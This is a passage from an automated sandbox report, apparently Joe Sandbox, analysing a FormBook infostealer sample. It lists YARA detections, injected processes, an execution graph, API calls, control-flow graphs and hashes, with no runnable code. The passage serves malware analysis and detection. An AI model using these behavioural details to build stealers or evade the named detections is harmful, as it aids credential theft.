                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:04:41:58
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff728280000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.4%
                                                                                        Dynamic/Decrypted Code Coverage:5%
                                                                                        Signature Coverage:14%
                                                                                        Total number of Nodes:121
                                                                                        Total number of Limit Nodes:7
                                                                                        execution_graph 78264 424703 78265 42471f 78264->78265 78266 424747 78265->78266 78267 42475b 78265->78267 78268 42c333 NtClose 78266->78268 78274 42c333 78267->78274 78270 424750 78268->78270 78271 424764 78277 42e4d3 RtlAllocateHeap 78271->78277 78273 42476f 78275 42c34d 78274->78275 78276 42c35e NtClose 78275->78276 78276->78271 78277->78273 78279 42b913 78280 42b92d 78279->78280 78283 3872df0 LdrInitializeThunk 78280->78283 78281 42b955 78283->78281 78284 42f5d3 78287 42e3b3 78284->78287 78290 42c693 78287->78290 78289 42e3cc 78291 42c6b0 78290->78291 78292 42c6c1 RtlFreeHeap 78291->78292 78292->78289 78293 424a93 78297 424aac 78293->78297 78294 424af4 78295 42e3b3 RtlFreeHeap 78294->78295 78296 424b04 78295->78296 78297->78294 78298 424b37 78297->78298 78300 424b3c 78297->78300 78299 42e3b3 RtlFreeHeap 78298->78299 78299->78300 78301 42e493 78304 42c643 78301->78304 78303 42e4ae 78305 42c660 78304->78305 78306 42c671 RtlAllocateHeap 78305->78306 78306->78303 78307 41e313 78308 41e339 78307->78308 78312 41e433 78308->78312 78313 42f613 RtlAllocateHeap RtlFreeHeap 78308->78313 78310 41e3d1 78310->78312 78314 42b963 78310->78314 78313->78310 78315 42b97d 78314->78315 78318 3872c0a 78315->78318 78316 42b9a9 78316->78312 78319 3872c11 78318->78319 78320 3872c1f LdrInitializeThunk 78318->78320 78319->78316 78320->78316 78321 41b133 78322 41b177 78321->78322 78323 41b198 78322->78323 78324 42c333 NtClose 78322->78324 78324->78323 78325 413e93 78326 413ead 78325->78326 78331 417653 78326->78331 78328 413ecb 78329 413f10 78328->78329 78330 413eff PostThreadMessageW 78328->78330 78330->78329 78332 417677 78331->78332 78333 41767e 78332->78333 78334 4176b3 LdrLoadDll 78332->78334 78333->78328 78334->78333 78335 401bb2 78336 401bba 78335->78336 78336->78336 78339 42fa43 78336->78339 78342 42df83 78339->78342 78343 42dfa9 78342->78343 78354 407653 78343->78354 78345 42dfbf 78353 401ca7 78345->78353 78357 41af43 78345->78357 78347 42dfde 78348 42dff3 78347->78348 78372 42c6e3 78347->78372 78368 427fe3 78348->78368 78351 42e00d 78352 42c6e3 ExitProcess 78351->78352 78352->78353 78375 416313 78354->78375 78356 407660 78356->78345 78358 41af6f 78357->78358 78386 41ae33 78358->78386 78361 41af9c 78364 42c333 NtClose 78361->78364 78366 41afa7 78361->78366 78362 41afd0 78362->78347 78363 41afb4 78363->78362 78365 42c333 NtClose 78363->78365 78364->78366 78367 41afc6 78365->78367 78366->78347 78367->78347 78369 428044 78368->78369 78371 428051 78369->78371 78397 4184c3 78369->78397 78371->78351 78373 42c700 78372->78373 78374 42c70e ExitProcess 78373->78374 78374->78348 78376 41632c 78375->78376 78378 416345 78376->78378 78379 42cd63 78376->78379 78378->78356 78381 42cd7d 78379->78381 78380 42cdac 78380->78378 78381->78380 78382 42b963 LdrInitializeThunk 78381->78382 78383 42ce08 78382->78383 78384 42e3b3 RtlFreeHeap 78383->78384 78385 42ce1a 78384->78385 78385->78378 78387 41af29 78386->78387 78388 41ae4d 78386->78388 78387->78361 78387->78363 78392 42ba03 78388->78392 78391 42c333 NtClose 78391->78387 78393 42ba1d 78392->78393 78396 38735c0 LdrInitializeThunk 78393->78396 78394 41af1d 78394->78391 78396->78394 78398 4184ed 78397->78398 78404 4189fb 78398->78404 78405 413b03 78398->78405 78400 418617 78401 42e3b3 RtlFreeHeap 78400->78401 78400->78404 78402 41862f 78401->78402 78403 42c6e3 ExitProcess 78402->78403 78402->78404 78403->78404 78404->78371 78409 413b23 78405->78409 78407 413b8c 78407->78400 78408 413b82 78408->78400 78409->78407 78410 41b253 RtlFreeHeap LdrInitializeThunk 78409->78410 78410->78408 78411 418c14 78412 42c333 NtClose 78411->78412 78413 418c1e 78412->78413 78278 3872b60 LdrInitializeThunk

                                                                                        Executed Functions

                                                                                        Function 004184C3 Relevance: 4.2, Strings: 3, Instructions: 439COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 97 4184c3-418537 call 42e453 * 3 call 404bd3 call 4240a3 108 418a06-418a0a 97->108 109 41853d-418567 call 42e403 97->109 112 418572 109->112 113 418569-418570 109->113 114 418574-41857e 112->114 113->114 115 418580 114->115 116 41859f-4185b1 call 4240d3 114->116 117 418583-418586 115->117 123 418a04-418a05 116->123 124 4185b7-4185cf call 42ddd3 116->124 119 418588-41858b 117->119 120 41858f-418599 117->120 119->117 122 41858d 119->122 120->116 122->116 123->108 124->123 127 4185d5-418622 call 413b03 124->127 127->123 130 418628-418648 call 42e3b3 127->130 133 418679-41867b 130->133 134 41864a-41864c 130->134 135 418684-4186a2 call 41afe3 133->135 137 41867d 133->137 134->135 136 41864e-41865c call 42d943 call 4071a3 134->136 135->123 143 4186a8-4186ca call 42bb33 135->143 144 418661-418666 136->144 137->135 147 4186cf-4186d4 143->147 144->133 146 418668-418677 144->146 148 4186da-418751 call 42b4d3 call 42b583 call 42e403 146->148 147->123 147->148 155 418753-41875b 148->155 156 41875d 148->156 157 418760-418792 155->157 156->157 158 418798-4187a1 157->158 159 41887e 157->159 161 4187a3-4187a6 158->161 162 4187b2-4187d3 call 42e403 158->162 160 418880 159->160 163 418887-41888b 160->163 161->158 164 4187a8-4187ad 161->164 170 4187d5-4187dd 162->170 171 4187df 162->171 166 418891-418895 163->166 167 41888d-41888f 163->167 164->160 166->163 167->166 169 418897-4188ab 167->169 173 418918-418968 call 4175d3 * 2 call 42e3d3 169->173 174 4188ad-4188b0 169->174 172 4187e2-4187f7 170->172 171->172 175 418811-418852 call 417553 call 42e403 172->175 176 4187f9-4187fc 172->176 206 41896a-41896e 173->206 207 41898d-418992 173->207 178 4188b3-4188b8 174->178 201 418854-418859 175->201 202 41885b 175->202 179 418803-418806 176->179 182 4188ba-4188bd 178->182 183 4188cf-4188d3 178->183 184 418808-41880b 179->184 185 41880f 179->185 182->183 188 4188bf-4188c1 182->188 183->178 189 4188d5-4188d7 183->189 184->179 190 41880d 184->190 185->175 188->183 193 4188c3-4188c6 188->193 189->173 194 4188d9-4188e2 189->194 190->175 193->183 198 4188c8 193->198 195 4188e4-4188e7 194->195 199 418912-418916 195->199 200 4188e9-4188ec 195->200 198->183 199->173 199->195 200->199 204 4188ee-4188f0 200->204 205 41885d-41887c call 414a63 201->205 202->205 204->199 210 4188f2-4188f5 204->210 205->160 209 41899a-4189ac call 42b6e3 206->209 211 418970-418981 call 407213 206->211 208 418994 207->208 207->209 208->209 219 4189b3-4189c8 call 41b1b3 209->219 210->199 215 4188f7-418910 210->215 217 418986-41898b 211->217 215->199 217->207 217->219 222 4189ca-4189f6 call 417553 * 2 call 42c6e3 219->222 228 4189fb-4189fe 222->228 228->123
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @j)$L$L
                                                                                        • API String ID: 0-2083849914
                                                                                        • Opcode ID: 271bcf04187c85e64262361b8b1fa458ff6e7d22e900a1545f025a1d405b9ba7
                                                                                        • Instruction ID: 2263ec9c81904febb31ee7711a99d95c1ab5b593920363bf7993c10253deb2be
                                                                                        • Opcode Fuzzy Hash: 271bcf04187c85e64262361b8b1fa458ff6e7d22e900a1545f025a1d405b9ba7
                                                                                        • Instruction Fuzzy Hash: 72F1A0B0D00219AFDF24DF94CC85AEEB7B8AF44304F1481AEE518A7341DB785A85CFA5
                                                                                        Function 00417653 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 308 417653-41766f 309 417677-41767c 308->309 310 417672 call 42f0b3 308->310 311 417682-417690 call 42f6b3 309->311 312 41767e-417681 309->312 310->309 315 4176a0-4176b1 call 42da53 311->315 316 417692-41769d call 42f953 311->316 321 4176b3-4176c5 LdrLoadDll 315->321 322 4176ca-4176cd 315->322 316->315 323 4176c7 321->323 323->322
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction ID: 892959356603833123e1c71540ef2e5d09206650632d8e43e8514516b00065a3
                                                                                        • Opcode Fuzzy Hash: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction Fuzzy Hash: 5C0171B2E0020DBBDF10DBE5DC42FDEB7789B54308F4081AAE90897241F634EB598B95
                                                                                        Function 0042C333 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 343 42c333-42c36c call 404993 call 42d543 NtClose
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C367
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: c253ba5626deb7eecf88775f9a9b5acb02255364b3fd36f80c1dfc940615c145
                                                                                        • Instruction ID: f76d2b7edd7b4b746de9e2cfaadf3b0e67f654803069f6f876bdab61643147d2
                                                                                        • Opcode Fuzzy Hash: c253ba5626deb7eecf88775f9a9b5acb02255364b3fd36f80c1dfc940615c145
                                                                                        • Instruction Fuzzy Hash: B3E04F766402147BD620EB6ADC01F9B776CDBC9714F40442AFA08A7182C674B90086E4
                                                                                        Function 038735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: de5b455dfe2440bb83c49f27617af67ad353f9e0ee9afe5f53598bf78526276a
                                                                                        • Instruction ID: 0c4895d414c41d1d18866422d722d3ae31371503f4fc5ca20503da01dc16948f
                                                                                        • Opcode Fuzzy Hash: de5b455dfe2440bb83c49f27617af67ad353f9e0ee9afe5f53598bf78526276a
                                                                                        • Instruction Fuzzy Hash: C890023160550806D100B2984554746100687D0301FB5C451A142856CD87958A5565A3
                                                                                        Function 03872B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
                                                                                        • Instruction ID: 66871c75473c08b40d51fe63dc972a439c0af9b2931c27f22c3969a41cc9069c
                                                                                        • Opcode Fuzzy Hash: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
                                                                                        • Instruction Fuzzy Hash: A7900261202404074105B2984454656400B87E0301BA5C061E2018594DC62589956126
                                                                                        Function 03872DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
                                                                                        • Instruction ID: 7152e8f79309b5124c13b769bd57648f4b61710c2819786d3777204fada2906f
                                                                                        • Opcode Fuzzy Hash: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
                                                                                        • Instruction Fuzzy Hash: 0C90023120140817D111B2984544747000A87D0341FE5C452A142855CD97568A56A122
                                                                                        Function 00413DD2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 413dd2-413e08 1 413e49 0->1 2 413e0a-413e0b 0->2 4 413ec2-413ef8 call 404903 call 424bb3 1->4 5 413e4b 1->5 3 413e0e-413e14 2->3 6 413e51 3->6 7 413e15-413e16 3->7 13 413efb-413efd 4->13 8 413e7c 5->8 9 413e4e-413e50 5->9 6->8 11 413e17-413e38 7->11 12 413dcb-413dd0 7->12 8->13 14 413e7e-413e8a 8->14 9->6 11->3 18 413e3a-413e48 11->18 12->0 16 413f1d-413f23 13->16 17 413eff-413f0e PostThreadMessageW 13->17 17->16 20 413f10-413f1a 17->20 18->1 20->16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 0-1716353560
                                                                                        • Opcode ID: dfca49e7ffdce6ebd91ae08e9e17e67ea5f53f725a6c0cbd5839875e1c5ef662
                                                                                        • Instruction ID: 2d73f18975ab1fe5133202aea94fb40fec3a7e718ba0c0e3e74c4de059b42303
                                                                                        • Opcode Fuzzy Hash: dfca49e7ffdce6ebd91ae08e9e17e67ea5f53f725a6c0cbd5839875e1c5ef662
                                                                                        • Instruction Fuzzy Hash: BB319273900348ABDB11DF68E8819EABBB8EB51755B0440EBE940DB312D2798E178794
                                                                                        Function 00413E57 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 23 413e57-413e5f 24 413e61 23->24 25 413ed4 23->25 27 413e20-413e38 24->27 28 413e63-413e6b 24->28 26 413ed7-413ef8 call 424bb3 25->26 49 413efb-413efd 26->49 29 413e3a-413e48 27->29 30 413e0e-413e14 27->30 31 413e11-413e14 28->31 32 413e6d-413e6f 28->32 37 413e49 29->37 34 413e51 30->34 35 413e15-413e16 30->35 31->34 36 413e16 31->36 38 413e71-413e7b 32->38 39 413ec5-413ed2 call 417653 call 404903 32->39 47 413e7c 34->47 42 413e17-413e38 35->42 43 413dcb-413e08 35->43 36->43 44 413e18-413e1e 36->44 45 413ec2-413ed2 call 404903 37->45 46 413e4b 37->46 38->47 39->25 42->29 42->30 43->37 55 413e0a-413e0b 43->55 44->27 45->26 46->47 50 413e4e-413e50 46->50 47->49 51 413e7e-413e8a 47->51 57 413f1d-413f23 49->57 58 413eff-413f0e PostThreadMessageW 49->58 50->34 55->30 58->57 59 413f10-413f1a 58->59 59->57
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560
                                                                                        • Opcode ID: 8944aa9a79fc8e47e58e63b18c9c12919880576f791fe8a45feb5c9bdb913f43
                                                                                        • Instruction ID: 13106a9031ff839c66380a6b6663e6fbb7e52f6bf34df1f6b5632b32cee52fbc
                                                                                        • Opcode Fuzzy Hash: 8944aa9a79fc8e47e58e63b18c9c12919880576f791fe8a45feb5c9bdb913f43
                                                                                        • Instruction Fuzzy Hash: 15217D329047487BC7009EA9ACC6DEEBBBCEF5135A70440AAE604DB301C72D8E438BC4
                                                                                        Function 00413E8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560
                                                                                        • Opcode ID: d50c194b9b3df1e5d6acd8095db65d14acbe5c11d617fc1036379ea3c7b9a2d2
                                                                                        • Instruction ID: ac54e02b86eafd8fa62dab3b35367e4fd2f82199c1007a4b8a916556a1750ec5
                                                                                        • Opcode Fuzzy Hash: d50c194b9b3df1e5d6acd8095db65d14acbe5c11d617fc1036379ea3c7b9a2d2
                                                                                        • Instruction Fuzzy Hash: 7511C272D0421C7AEB10AAA69C81DEF7B7CDF40698F408069FA0477241D26D4F068BA5
                                                                                        Function 00413E93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560
                                                                                        • Opcode ID: 1244068478a8ed838c1cde428de27f54720490660c20e634c10a33a3ffc18563
                                                                                        • Instruction ID: 061d848c527701ed95326e11a08803b0925664f3ecd41cce8ea45779600c2f1d
                                                                                        • Opcode Fuzzy Hash: 1244068478a8ed838c1cde428de27f54720490660c20e634c10a33a3ffc18563
                                                                                        • Instruction Fuzzy Hash: EA01C4B2D4011C7ADB10AAE69C81DEF7B7CDF40698F408069FA0477241D66C4F064BA5
                                                                                        Function 004176EC Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 324 4176ec-4176ee 325 4176f0-417708 324->325 326 41769a-4176b1 call 42da53 324->326 330 4176b3-4176c5 LdrLoadDll 326->330 331 4176ca-4176cd 326->331 332 4176c7 330->332 332->331
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 9dd5790946f4cc0dfb005e248ed0542b3028361f8d8d052740d6f813deef9118
                                                                                        • Instruction ID: 3930cb624f645bc7f3d776ce437db14fe56a18906c151e3c580dbf0bca8a858e
                                                                                        • Opcode Fuzzy Hash: 9dd5790946f4cc0dfb005e248ed0542b3028361f8d8d052740d6f813deef9118
                                                                                        • Instruction Fuzzy Hash: EDF0E9B6E0450ABBDF00DEB8DC51FDE77B0DB55354F148196D4089A102E635EA5AC780
                                                                                        Function 0042C643 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 333 42c643-42c687 call 404993 call 42d543 RtlAllocateHeap
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,0041E3D1,?,?,00000000,?,0041E3D1,?,?,?), ref: 0042C682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 61d4f8c076ad4c1a884c16ea6189318a6020c21840bc9b2a53b4630d53a2b431
                                                                                        • Instruction ID: a4d943de917b46e24c7129a43ed36b9e2968cb6968e3c69bf40b565ba00b0cef
                                                                                        • Opcode Fuzzy Hash: 61d4f8c076ad4c1a884c16ea6189318a6020c21840bc9b2a53b4630d53a2b431
                                                                                        • Instruction Fuzzy Hash: F3E0EDB16442157BD614EF99EC41FAB77ACEFC9714F404429FA08A7242DA70BD10C7B9
                                                                                        Function 0042C693 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 338 42c693-42c6d7 call 404993 call 42d543 RtlFreeHeap
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00416ECD,000000F4), ref: 0042C6D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: aa325a07f3c3d181f1d3e58923e691fc5f8f1353cb4603d5c4d13caa4e3d4759
                                                                                        • Instruction ID: 3b9590067691d0d5cff8fdedf5211defcc27a14c0dc3bb737c57f02617d16efe
                                                                                        • Opcode Fuzzy Hash: aa325a07f3c3d181f1d3e58923e691fc5f8f1353cb4603d5c4d13caa4e3d4759
                                                                                        • Instruction Fuzzy Hash: 66E092B16042147BD610EF59EC41FAB33ACEFC8714F004029FA08A7241D770BD1087B8
                                                                                        Function 0042C6E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,5AA3D9B6,?,?,5AA3D9B6), ref: 0042C717
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 88790c67740fc6575a7fa2231eea282f7509b3e8f150cd1289510054a3044193
                                                                                        • Instruction ID: f28e34e9f44c0f1d219c41e05be5e2b8ffcfe28a2d5b706d76407a2867ddb17f
                                                                                        • Opcode Fuzzy Hash: 88790c67740fc6575a7fa2231eea282f7509b3e8f150cd1289510054a3044193
                                                                                        • Instruction Fuzzy Hash: 10E046766002247BDA20AA6AEC41F9F77ACDBC5714F40442AFA08A7241C7B1BA0186E4
                                                                                        Function 03872C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
                                                                                        • Instruction ID: cb0054b3d92d88ebb062ce99be82bf843719ec901fd717cdd5a117496de06d25
                                                                                        • Opcode Fuzzy Hash: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
                                                                                        • Instruction Fuzzy Hash: 57B09B719015C5C9DA11F7A04608717790567D0701F69C4E1D3034645E4739C1D5E176

                                                                                        Non-executed Functions

                                                                                        Function 038B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2160512332
                                                                                        • Opcode ID: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
                                                                                        • Instruction ID: c9fb79fe6cac786a2b8e5783199a299aff21857ba4ab7521bd2c30f6bc4a6dce
                                                                                        • Opcode Fuzzy Hash: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
                                                                                        • Instruction Fuzzy Hash: AF928B75608746ABD720DEA4C880BABB7F8BB84754F084D9DFA94DB350D770E844CB92
                                                                                        Function 038268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
